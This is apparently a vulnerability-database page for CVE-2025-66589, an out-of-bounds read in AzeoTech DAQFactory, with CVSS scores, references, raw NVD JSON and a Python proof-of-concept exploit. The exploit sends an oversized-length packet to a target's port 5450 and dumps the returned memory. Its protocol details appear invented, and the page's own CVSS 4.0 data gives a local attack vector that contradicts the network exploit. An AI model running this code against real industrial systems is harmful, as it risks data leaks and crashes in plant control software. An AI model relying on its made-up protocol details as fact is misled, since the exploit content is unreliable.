CVE-2025-66589

Description

In AzeoTech DAQFactory release 20.7 (Build 2555), an Out-of-bounds Read vulnerability can be exploited by an attacker to cause the program to read data past the end of an allocated buffer. This could allow an attacker to disclose information or cause a system crash.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:azeotech:daqfactory:*:*:*:*:*:*:*:* - VULNERABLE

AzeoTech DAQFactory 20.7 (Build 2555) 及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-66589 PoC - AzeoTech DAQFactory Out-of-bounds Read
# Target: AzeoTech DAQFactory 20.7 (Build 2555)
# This PoC demonstrates an OOB read vulnerability in DAQFactory

import socket
import struct
import sys

def send_exploit(target_ip, target_port=5450):
    """
    Send malicious request to trigger OOB read vulnerability
    DAQFactory uses a proprietary protocol on port 5450
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        
        # Craft malicious packet to trigger OOB read
        # Protocol header: magic bytes + command + length + payload
        packet = b'\x44\x41\x51\x46'  # DAQF magic header
        packet += struct.pack('<H', 0x0001)  # Command: Read Request
        
        # Malicious payload designed to trigger OOB read
        # The vulnerability occurs when processing oversized length field
        payload_size = 0xFFFF  # Oversized length to trigger OOB
        packet += struct.pack('<I', payload_size)  # Length field
        packet += b'\x41' * 100  # Padding data
        
        sock.send(packet)
        print(f"[+] Malicious packet sent to {target_ip}:{target_port}")
        
        # Receive response (may contain leaked memory data)
        response = sock.recv(4096)
        if response:
            print(f"[+] Received response ({len(response)} bytes)")
            print(f"[+] Raw data: {response.hex()}")
        
        sock.close()
        return True
        
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 5450
    
    print(f"[*] CVE-2025-66589 PoC - DAQFactory OOB Read")
    print(f"[*] Target: {target}:{port}")
    send_exploit(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66589
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66589
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66589/
[4] VulDB https://vuldb.com/cve/CVE-2025-66589
[5] https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66589", "sourceIdentifier": "[email protected]", "published": "2025-12-11T21:15:58.073", "lastModified": "2026-01-02T20:09:20.157", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In AzeoTech DAQFactory release 20.7 (Build 2555), an Out-of-bounds Read vulnerability can be exploited by an attacker to cause the program to read data past the end of an allocated buffer. This could allow an attacker to disclose information or cause a system crash."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:azeotech:daqfactory:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.1", "matchCriteriaId": "5376DDEC-0BAA-465A-9EFB-62B3600336E8"}]}]}], "references": [{"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}